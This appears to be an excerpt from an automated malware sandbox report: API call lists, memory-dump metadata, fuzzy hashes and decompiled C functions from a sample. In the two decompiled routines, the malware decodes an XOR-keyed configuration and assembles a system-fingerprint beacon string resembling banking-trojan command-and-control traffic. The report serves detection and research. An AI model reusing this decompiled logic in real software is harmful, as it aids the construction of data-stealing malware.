                                • Part of subcall function 049D60DD: memset.NTDLL ref: 049D6188
                                • Part of subcall function 049D60DD: memset.NTDLL ref: 049D619C
                              • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,049D5BE3,?,?,049D512B,00000002,?,?,?), ref: 049D6A32
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: memcpymemset$FreeHeap
                              • String ID:
                              • API String ID: 3053036209-0
                              • Opcode ID: 1de2f2b2d369184cfa0738fd9f5a90c1c0e5296654ede8fae6ba90d5d4c21a8e
                              • Instruction ID: 4aaefc5fecad5cdda1ae3702d41db7fcf6e4a789764490f36e0f0ab0051f20eb
                              • Opcode Fuzzy Hash: 1de2f2b2d369184cfa0738fd9f5a90c1c0e5296654ede8fae6ba90d5d4c21a8e
                              • Instruction Fuzzy Hash: 23E08C37400128B7DB122E98EC00DEFBF5CCF82694F04C030FE088A200E632EA2097E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 053C2E3B
                                • Part of subcall function 053DD058: RegOpenKeyExA.KERNEL32(053C2E53,00000000,00000000,00020119,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053DD09F
                                • Part of subcall function 053DD058: RegOpenKeyExA.ADVAPI32(053C2E53,053C2E53,00000000,00020019,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053DD0B5
                                • Part of subcall function 053DD058: RegCloseKey.ADVAPI32(80000001,80000001,?,?,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053DD0FE
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Open$Closememset
                              • String ID:
                              • API String ID: 1685373161-0
                              • Opcode ID: 898731edf258f07b5705594c62e6b3be3d8b821792af44caa82211b383a9c5a1
                              • Instruction ID: 11b636deecc4d6037844db1fac0c3c850c7ff0a9f85324c4313dee5b86dcd799
                              • Opcode Fuzzy Hash: 898731edf258f07b5705594c62e6b3be3d8b821792af44caa82211b383a9c5a1
                              • Instruction Fuzzy Hash: B5E0C73134010CBBEB00AE90EC05FADBB68EF40344F808008BE0C2F282CA71EA64C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,053EC5B8,0000002C,053D656E,064F8DBA,?,00000000,053CEAB2,?,00000318), ref: 053E35A3
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              • Opcode ID: ecb0fc0758cdddadd2ea897e89923ef8a9f47763e299cd7632c39e1eb181bcc8
                              • Instruction ID: 3dc13200978133936a17139680828ece3de42904841545e3fc73d6695c747d1c
                              • Opcode Fuzzy Hash: ecb0fc0758cdddadd2ea897e89923ef8a9f47763e299cd7632c39e1eb181bcc8
                              • Instruction Fuzzy Hash: 50D01731E01629DBCB219B95DC8AA9EFBB0BF08720F608224F8607B1D0C7301912DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                                • Part of subcall function 053C6285: ExpandEnvironmentStringsW.KERNEL32(053D34DD,00000000,00000000,00000001,00000000,00000000,053CEFEF,053D34DD,00000000,053CEFEF,00000020), ref: 053C629C
                                • Part of subcall function 053C6285: ExpandEnvironmentStringsW.KERNEL32(053D34DD,00000000,00000000,00000000), ref: 053C62B6
                              • lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 053DF68B
                              • lstrlenW.KERNEL32(?,?,00000000), ref: 053DF697
                              • memset.NTDLL ref: 053DF6DF
                              • FindFirstFileW.KERNEL32(00000000,00000000), ref: 053DF6FA
                              • lstrlenW.KERNEL32(0000002C), ref: 053DF732
                              • lstrlenW.KERNEL32(?), ref: 053DF73A
                              • memset.NTDLL ref: 053DF75D
                              • wcscpy.NTDLL ref: 053DF76F
                              • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 053DF795
                              • RtlEnterCriticalSection.NTDLL(?), ref: 053DF7CA
                                • Part of subcall function 053E69F0: RtlFreeHeap.NTDLL(00000000,?,053C62C2,00000000), ref: 053E69FC
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 053DF7E6
                              • FindNextFileW.KERNEL32(?,00000000), ref: 053DF7FF
                              • WaitForSingleObject.KERNEL32(00000000), ref: 053DF811
                              • FindClose.KERNEL32(?), ref: 053DF826
                              • FindFirstFileW.KERNEL32(00000000,00000000), ref: 053DF83A
                              • lstrlenW.KERNEL32(0000002C), ref: 053DF85C
                              • FindNextFileW.KERNEL32(?,00000000), ref: 053DF8D2
                              • WaitForSingleObject.KERNEL32(00000000), ref: 053DF8E4
                              • FindClose.KERNEL32(?), ref: 053DF8FF
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                              • String ID:
                              • API String ID: 2962561936-0
                              • Opcode ID: 3598660fbffd7b9a547a4a74aee541dbabafefc09ebf47931b0612ac1a87ac6a
                              • Instruction ID: 2c0ea78a8b49dcb4b574fe4f21e9abfd7a8144a4fd20e7c593b7bb8f33098815
                              • Opcode Fuzzy Hash: 3598660fbffd7b9a547a4a74aee541dbabafefc09ebf47931b0612ac1a87ac6a
                              • Instruction Fuzzy Hash: C8819E72508345AFC761EF24ECC9B1BBBF9FF84304F044829F8969A191DBB5D8448B62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E049D294D(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                              				int _v8;
                              				void* _v12;
                              				void* _v16;
                              				signed int _t28;
                              				signed int _t33;
                              				signed int _t39;
                              				char* _t45;
                              				char* _t46;
                              				char* _t47;
                              				char* _t48;
                              				char* _t49;
                              				char* _t50;
                              				void* _t51;
                              				void* _t52;
                              				void* _t53;
                              				intOrPtr _t54;
                              				void* _t56;
                              				intOrPtr _t57;
                              				intOrPtr _t58;
                              				signed int _t61;
                              				intOrPtr _t64;
                              				signed int _t65;
                              				signed int _t70;
                              				void* _t72;
                              				void* _t73;
                              				signed int _t75;
                              				signed int _t78;
                              				signed int _t82;
                              				signed int _t86;
                              				signed int _t90;
                              				signed int _t94;
                              				signed int _t98;
                              				void* _t101;
                              				void* _t102;
                              				void* _t115;
                              				void* _t118;
                              				intOrPtr _t121;
                              
                              				_t118 = __esi;
                              				_t115 = __edi;
                              				_t104 = __ecx;
                              				_t101 = __ebx;
                              				_t28 =  *0x49dd2b4; // 0x69b25f44
                              				if(E049D5740( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                              					 *0x49dd308 = _v8;
                              				}
                              				_t33 =  *0x49dd2b4; // 0x69b25f44
                              				if(E049D5740( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                              					_v12 = 2;
                              					L69:
                              					return _v12;
                              				}
                              				_t39 =  *0x49dd2b4; // 0x69b25f44
                              				_push(_t115);
                              				if(E049D5740( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                              					L67:
                              					HeapFree( *0x49dd270, 0, _v16);
                              					goto L69;
                              				} else {
                              					_push(_t101);
                              					_t102 = _v12;
                              					if(_t102 == 0) {
                              						_t45 = 0;
                              					} else {
                              						_t98 =  *0x49dd2b4; // 0x69b25f44
                              						_t45 = E049D4F59(_t104, _t102, _t98 ^ 0x7895433b);
                              					}
                              					_push(_t118);
                              					if(_t45 != 0) {
                              						_t104 =  &_v8;
                              						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                              							 *0x49dd278 = _v8;
                              						}
                              					}
                              					if(_t102 == 0) {
                              						_t46 = 0;
                              					} else {
                              						_t94 =  *0x49dd2b4; // 0x69b25f44
                              						_t46 = E049D4F59(_t104, _t102, _t94 ^ 0x219b08c7);
                              					}
                              					if(_t46 != 0) {
                              						_t104 =  &_v8;
                              						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                              							 *0x49dd27c = _v8;
                              						}
                              					}
                              					if(_t102 == 0) {
                              						_t47 = 0;
                              					} else {
                              						_t90 =  *0x49dd2b4; // 0x69b25f44
                              						_t47 = E049D4F59(_t104, _t102, _t90 ^ 0x31fc0661);
                              					}
                              					if(_t47 != 0) {
                              						_t104 =  &_v8;
                              						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                              							 *0x49dd280 = _v8;
                              						}
                              					}
                              					if(_t102 == 0) {
                              						_t48 = 0;
                              					} else {
                              						_t86 =  *0x49dd2b4; // 0x69b25f44
                              						_t48 = E049D4F59(_t104, _t102, _t86 ^ 0x0cd926ce);
                              					}
                              					if(_t48 != 0) {
                              						_t104 =  &_v8;
                              						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                              							 *0x49dd004 = _v8;
                              						}
                              					}
                              					if(_t102 == 0) {
                              						_t49 = 0;
                              					} else {
                              						_t82 =  *0x49dd2b4; // 0x69b25f44
                              						_t49 = E049D4F59(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                              					}
                              					if(_t49 != 0) {
                              						_t104 =  &_v8;
                              						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                              							 *0x49dd02c = _v8;
                              						}
                              					}
                              					if(_t102 == 0) {
                              						_t50 = 0;
                              					} else {
                              						_t78 =  *0x49dd2b4; // 0x69b25f44
                              						_t50 = E049D4F59(_t104, _t102, _t78 ^ 0x2878b929);
                              					}
                              					if(_t50 == 0) {
                              						L41:
                              						 *0x49dd284 = 5;
                              						goto L42;
                              					} else {
                              						_t104 =  &_v8;
                              						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                              							goto L41;
                              						} else {
                              							L42:
                              							if(_t102 == 0) {
                              								_t51 = 0;
                              							} else {
                              								_t75 =  *0x49dd2b4; // 0x69b25f44
                              								_t51 = E049D4F59(_t104, _t102, _t75 ^ 0x261a367a);
                              							}
                              							if(_t51 != 0) {
                              								_push(_t51);
                              								_t72 = 0x10;
                              								_t73 = E049D2C74(_t72);
                              								if(_t73 != 0) {
                              									_push(_t73);
                              									E049D4D70();
                              								}
                              							}
                              							if(_t102 == 0) {
                              								_t52 = 0;
                              							} else {
                              								_t70 =  *0x49dd2b4; // 0x69b25f44
                              								_t52 = E049D4F59(_t104, _t102, _t70 ^ 0xb9d404b2);
                              							}
                              							if(_t52 != 0 && E049D2C74(0, _t52) != 0) {
                              								_t121 =  *0x49dd35c; // 0x58195b0
                              								E049D3A19(_t121 + 4, _t68);
                              							}
                              							if(_t102 == 0) {
                              								_t53 = 0;
                              							} else {
                              								_t65 =  *0x49dd2b4; // 0x69b25f44
                              								_t53 = E049D4F59(_t104, _t102, _t65 ^ 0x3df17130);
                              							}
                              							if(_t53 == 0) {
                              								L59:
                              								_t54 =  *0x49dd2b8; // 0xe3a5a8
                              								_t22 = _t54 + 0x49de252; // 0x616d692f
                              								 *0x49dd304 = _t22;
                              								goto L60;
                              							} else {
                              								_t64 = E049D2C74(0, _t53);
                              								 *0x49dd304 = _t64;
                              								if(_t64 != 0) {
                              									L60:
                              									if(_t102 == 0) {
                              										_t56 = 0;
                              									} else {
                              										_t61 =  *0x49dd2b4; // 0x69b25f44
                              										_t56 = E049D4F59(_t104, _t102, _t61 ^ 0xd2079859);
                              									}
                              									if(_t56 == 0) {
                              										_t57 =  *0x49dd2b8; // 0xe3a5a8
                              										_t23 = _t57 + 0x49de79a; // 0x6976612e
                              										_t58 = _t23;
                              									} else {
                              										_t58 = E049D2C74(0, _t56);
                              									}
                              									 *0x49dd370 = _t58;
                              									HeapFree( *0x49dd270, 0, _t102);
                              									_v12 = 0;
                              									goto L67;
                              								}
                              								goto L59;
                              							}
                              						}
                              					}
                              				}
                               			}

                              APIs
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,049DD00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049D29F2
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,049DD00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049D2A24
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,049DD00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049D2A56
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,049DD00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049D2A88
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,049DD00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049D2ABA
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,049DD00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049D2AEC
                              • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 049D2BEB
                              • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 049D2BFF
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FreeHeap
                              • String ID: Uxt
                              • API String ID: 3298025750-1536154274
                              • Opcode ID: 35385f29c9e8380800973f0be430bc0e5786724f0cffcc3c29bba38494e464c0
                              • Instruction ID: 47f00388e5b07b149b55b3d37ee568b810121b24310f722ac3d4aeb5d708a76a
                              • Opcode Fuzzy Hash: 35385f29c9e8380800973f0be430bc0e5786724f0cffcc3c29bba38494e464c0
                              • Instruction Fuzzy Hash: 5C819074B05205AEDB20DFB8DE84D6B7BBDEB883047248AB5E105D7144E6B8FD859B20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 74%
                              			E049D7132(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                              				void* _v8;
                              				signed int _v12;
                              				void* _v16;
                              				void* _v20;
                              				void* _v24;
                              				void* _v28;
                              				void* __ebx;
                              				void* __edi;
                              				long _t59;
                              				intOrPtr _t60;
                              				intOrPtr _t61;
                              				intOrPtr _t62;
                              				intOrPtr _t63;
                              				intOrPtr _t64;
                              				void* _t67;
                              				intOrPtr _t68;
                              				int _t71;
                              				void* _t72;
                              				void* _t73;
                              				void* _t75;
                              				void* _t78;
                              				intOrPtr _t82;
                              				intOrPtr _t86;
                              				intOrPtr* _t88;
                              				void* _t94;
                              				intOrPtr _t100;
                              				signed int _t104;
                              				char** _t106;
                              				int _t109;
                              				intOrPtr* _t112;
                              				intOrPtr* _t114;
                              				intOrPtr* _t116;
                              				intOrPtr* _t118;
                              				intOrPtr _t121;
                              				intOrPtr _t126;
                              				int _t130;
                              				CHAR* _t132;
                              				intOrPtr _t133;
                              				void* _t134;
                              				void* _t143;
                              				int _t144;
                              				void* _t145;
                              				intOrPtr _t146;
                              				void* _t148;
                              				long _t152;
                              				intOrPtr* _t153;
                              				intOrPtr* _t154;
                              				intOrPtr* _t157;
                              				void* _t158;
                              				void* _t160;
                              
                              				_t143 = __edx;
                              				_t134 = __ecx;
                              				_t59 = __eax;
                              				_v12 = 8;
                              				if(__eax == 0) {
                              					_t59 = GetTickCount();
                              				}
                              				_t60 =  *0x49dd018; // 0x9945a377
                              				asm("bswap eax");
                              				_t61 =  *0x49dd014; // 0x3a87c8cd
                              				_t132 = _a16;
                              				asm("bswap eax");
                              				_t62 =  *0x49dd010; // 0xd8d2f808
                              				asm("bswap eax");
                              				_t63 =  *0x49dd00c; // 0x13d015ef
                              				asm("bswap eax");
                              				_t64 =  *0x49dd2b8; // 0xe3a5a8
                              				_t3 = _t64 + 0x49de633; // 0x74666f73
                              				_t144 = wsprintfA(_t132, _t3, 3, 0x3f87e, _t63, _t62, _t61, _t60,  *0x49dd02c,  *0x49dd004, _t59);
                              				_t67 = E049D8DA6();
                              				_t68 =  *0x49dd2b8; // 0xe3a5a8
                              				_t4 = _t68 + 0x49de673; // 0x74707526
                              				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                              				_t160 = _t158 + 0x38;
                              				_t145 = _t144 + _t71;
                              				_t72 = E049D40AC(_t134);
                              				_t133 = __imp__; // 0x74785520
                              				_v8 = _t72;
                              				if(_t72 != 0) {
                              					_t126 =  *0x49dd2b8; // 0xe3a5a8
                              					_t7 = _t126 + 0x49de8b2; // 0x736e6426
                              					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                              					_t160 = _t160 + 0xc;
                              					_t145 = _t145 + _t130;
                              					HeapFree( *0x49dd270, 0, _v8);
                              				}
                              				_t73 = E049D8941();
                              				_v8 = _t73;
                              				if(_t73 != 0) {
                              					_t121 =  *0x49dd2b8; // 0xe3a5a8
                              					_t11 = _t121 + 0x49de885; // 0x6f687726
                              					wsprintfA(_t145 + _a16, _t11, _t73);
                              					_t160 = _t160 + 0xc;
                              					HeapFree( *0x49dd270, 0, _v8);
                              				}
                              				_t146 =  *0x49dd35c; // 0x58195b0
                              				_t75 = E049D3FB8(0x49dd00a, _t146 + 4);
                              				_t152 = 0;
                              				_v20 = _t75;
                              				if(_t75 == 0) {
                              					L26:
                              					HeapFree( *0x49dd270, _t152, _a16);
                              					return _v12;
                              				} else {
                              					_t78 = RtlAllocateHeap( *0x49dd270, 0, 0x800);
                              					_v8 = _t78;
                              					if(_t78 == 0) {
                              						L25:
                              						HeapFree( *0x49dd270, _t152, _v20);
                              						goto L26;
                              					}
                              					E049D47EF(GetTickCount());
                              					_t82 =  *0x49dd35c; // 0x58195b0
                              					__imp__(_t82 + 0x40);
                              					asm("lock xadd [eax], ecx");
                              					_t86 =  *0x49dd35c; // 0x58195b0
                              					__imp__(_t86 + 0x40);
                              					_t88 =  *0x49dd35c; // 0x58195b0
                              					_t148 = E049DA7FB(1, _t143, _a16,  *_t88);
                              					_v28 = _t148;
                              					asm("lock xadd [eax], ecx");
                              					if(_t148 == 0) {
                              						L24:
                              						HeapFree( *0x49dd270, _t152, _v8);
                              						goto L25;
                              					}
                              					StrTrimA(_t148, 0x49dc2ac);
                              					_push(_t148);
                              					_t94 = E049D6F6D();
                              					_v16 = _t94;
                              					if(_t94 == 0) {
                              						L23:
                              						HeapFree( *0x49dd270, _t152, _t148);
                              						goto L24;
                              					}
                              					_t153 = __imp__;
                              					 *_t153(_t148, _a4);
                              					 *_t153(_v8, _v20);
                              					_t154 = __imp__;
                              					 *_t154(_v8, _v16);
                              					_t100 = E049D65F6( *_t154(_v8, _t148), _v8);
                              					_a4 = _t100;
                              					if(_t100 == 0) {
                              						_v12 = 8;
                              						L21:
                              						E049D55F1();
                              						L22:
                              						HeapFree( *0x49dd270, 0, _v16);
                              						_t152 = 0;
                              						goto L23;
                              					}
                              					_t104 = E049D7681(_t133, 0xffffffffffffffff, _t148,  &_v24);
                              					_v12 = _t104;
                              					if(_t104 == 0) {
                              						_t157 = _v24;
                              						_v12 = E049D42E6(_t157, _a4, _a8, _a12);
                              						_t112 =  *((intOrPtr*)(_t157 + 8));
                              						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                              						_t114 =  *((intOrPtr*)(_t157 + 8));
                              						 *((intOrPtr*)( *_t114 + 8))(_t114);
                              						_t116 =  *((intOrPtr*)(_t157 + 4));
                              						 *((intOrPtr*)( *_t116 + 8))(_t116);
                              						_t118 =  *_t157;
                              						 *((intOrPtr*)( *_t118 + 8))(_t118);
                              						E049D6DFA(_t157);
                              					}
                              					if(_v12 != 0x10d2) {
                              						L16:
                              						if(_v12 == 0) {
                              							_t106 = _a8;
                              							if(_t106 != 0) {
                              								_t149 =  *_t106;
                              								_t155 =  *_a12;
                              								wcstombs( *_t106,  *_t106,  *_a12);
                              								_t109 = E049D2F36(_t149, _t149, _t155 >> 1);
                              								_t148 = _v28;
                              								 *_a12 = _t109;
                              							}
                              						}
                              						goto L19;
                              					} else {
                              						if(_a8 != 0) {
                              							L19:
                              							E049D6DFA(_a4);
                              							if(_v12 == 0 || _v12 == 0x10d2) {
                              								goto L22;
                              							} else {
                              								goto L21;
                              							}
                              						}
                              						_v12 = _v12 & 0x00000000;
                              						goto L16;
                              					}
                              				}
                               			}

                              APIs
                              • GetTickCount.KERNEL32 ref: 049D7146
                              • wsprintfA.USER32 ref: 049D7196
                              • wsprintfA.USER32 ref: 049D71B3
                              • wsprintfA.USER32 ref: 049D71DF
                              • HeapFree.KERNEL32(00000000,?), ref: 049D71F1
                              • wsprintfA.USER32 ref: 049D7212
                              • HeapFree.KERNEL32(00000000,?), ref: 049D7222
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049D7250
                              • GetTickCount.KERNEL32 ref: 049D7261
                              • RtlEnterCriticalSection.NTDLL(05819570), ref: 049D7275
                              • RtlLeaveCriticalSection.NTDLL(05819570), ref: 049D7293
                                • Part of subcall function 049DA7FB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,?,?,74785520,049D64DC,?,058195B0), ref: 049DA826
                                • Part of subcall function 049DA7FB: lstrlen.KERNEL32(?,?,74785520,049D64DC,?,058195B0), ref: 049DA82E
                                • Part of subcall function 049DA7FB: strcpy.NTDLL ref: 049DA845
                                • Part of subcall function 049DA7FB: lstrcat.KERNEL32(00000000,?), ref: 049DA850
                                • Part of subcall function 049DA7FB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,049D64DC,?,74785520,049D64DC,?,058195B0), ref: 049DA86D
                              • StrTrimA.SHLWAPI(00000000,049DC2AC,?,058195B0), ref: 049D72CA
                                • Part of subcall function 049D6F6D: lstrlen.KERNEL32(05819B58,00000000,00000000,?,049D6507,00000000), ref: 049D6F7D
                                • Part of subcall function 049D6F6D: lstrlen.KERNEL32(?), ref: 049D6F85
                                • Part of subcall function 049D6F6D: lstrcpy.KERNEL32(00000000,05819B58), ref: 049D6F99
                                • Part of subcall function 049D6F6D: lstrcat.KERNEL32(00000000,?), ref: 049D6FA4
                              • lstrcpy.KERNEL32(00000000,?), ref: 049D72EB
                              • lstrcpy.KERNEL32(?,?), ref: 049D72F3
                              • lstrcat.KERNEL32(?,?), ref: 049D7301
                              • lstrcat.KERNEL32(?,00000000), ref: 049D7307
                                • Part of subcall function 049D65F6: lstrlen.KERNEL32(?,00000000,05819B78,00000000,049D25B8,05819D56,69B25F44,?,?,?,?,69B25F44,00000005,049DD00C,4D283A53,?), ref: 049D65FD
                                • Part of subcall function 049D65F6: mbstowcs.NTDLL ref: 049D6626
                                • Part of subcall function 049D65F6: memset.NTDLL ref: 049D6638
                              • wcstombs.NTDLL ref: 049D7398
                                • Part of subcall function 049D42E6: SysAllocString.OLEAUT32(?), ref: 049D4327
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              • HeapFree.KERNEL32(00000000,?,?), ref: 049D73D9
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 049D73E5
                              • HeapFree.KERNEL32(00000000,?,?,058195B0), ref: 049D73F1
                              • HeapFree.KERNEL32(00000000,?), ref: 049D73FD
                              • HeapFree.KERNEL32(00000000,?), ref: 049D7409
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                              • String ID: Uxt
                              • API String ID: 3748877296-1536154274
                              • Opcode ID: f9836dab4d7b3adec2170cf8b4b899b7f31131471095c8244fd60ff41aa7a564
                              • Instruction ID: 694ed5c5bd6bb400ba1c8bc2ae23d161e1b3c2f3e91e0d7a920e9369a40d6287
                              • Opcode Fuzzy Hash: f9836dab4d7b3adec2170cf8b4b899b7f31131471095c8244fd60ff41aa7a564
                              • Instruction Fuzzy Hash: 2D912871901208AFDB11DFA8EC84AAABFB9EF48314F148175F908D7250D738ED95DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLastError.KERNEL32 ref: 053D9D51
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053D9D6D
                              • GetLastError.KERNEL32 ref: 053D9DBC
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053D9DD2
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053D9DE6
                              • GetLastError.KERNEL32 ref: 053D9E00
                              • GetLastError.KERNEL32 ref: 053D9E33
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053D9E51
                              • lstrlenW.KERNEL32(00000000,?), ref: 053D9E7D
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053D9E92
                              • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 053D9F66
                              • HeapFree.KERNEL32(00000000,?), ref: 053D9F75
                              • WaitForSingleObject.KERNEL32(00000000), ref: 053D9F8A
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053D9F9D
                              • HeapFree.KERNEL32(00000000,?), ref: 053D9FAF
                              • RtlExitUserThread.NTDLL(?,?), ref: 053D9FC4
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                              • String ID:
                              • API String ID: 3853681310-3916222277
                              • Opcode ID: d9483308440138e0729c01a51506e4d9c896bd830e7f29785d5acdfb92e00cdb
                              • Instruction ID: cbd98c471d02029c217475b0921d5921f9326385d77d8cf3f650412e18211853
                              • Opcode Fuzzy Hash: d9483308440138e0729c01a51506e4d9c896bd830e7f29785d5acdfb92e00cdb
                              • Instruction Fuzzy Hash: C2814B72910209EFDB219FA4EC89EAEBFBDFB48304F000469F505AB290DB719D05CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053E32FF: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3337
                                • Part of subcall function 053E32FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 053E334B
                                • Part of subcall function 053E32FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3365
                                • Part of subcall function 053E32FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 053D6781
                              • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 053D67A5
                              • HeapFree.KERNEL32(00000000,?,00000029,00000000,00000000,?), ref: 053D67D0
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 053D67FC
                              • HeapFree.KERNEL32(00000000,053EA3F8,0000002A,00000000,00000000,00000000), ref: 053D6869
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 053D68E1
                              • wsprintfA.USER32 ref: 053D68FD
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 053D691F
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 053D6A25
                              • wsprintfA.USER32 ref: 053D6A3C
                              • lstrlen.KERNEL32(00000000,00000000), ref: 053D6A47
                              • lstrlen.KERNEL32(00000000,00000000), ref: 053D6908
                                • Part of subcall function 053CFD22: lstrlen.KERNEL32(?,?,00000000,00000000,053DD9EF,00000011,?,00000001,00000000,?,-00000008), ref: 053CFD52
                                • Part of subcall function 053CFD22: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 053CFD68
                                • Part of subcall function 053CFD22: memcpy.NTDLL(00000010,?,00000000), ref: 053CFD9E
                                • Part of subcall function 053CFD22: memcpy.NTDLL(00000010,00000000,?), ref: 053CFDB9
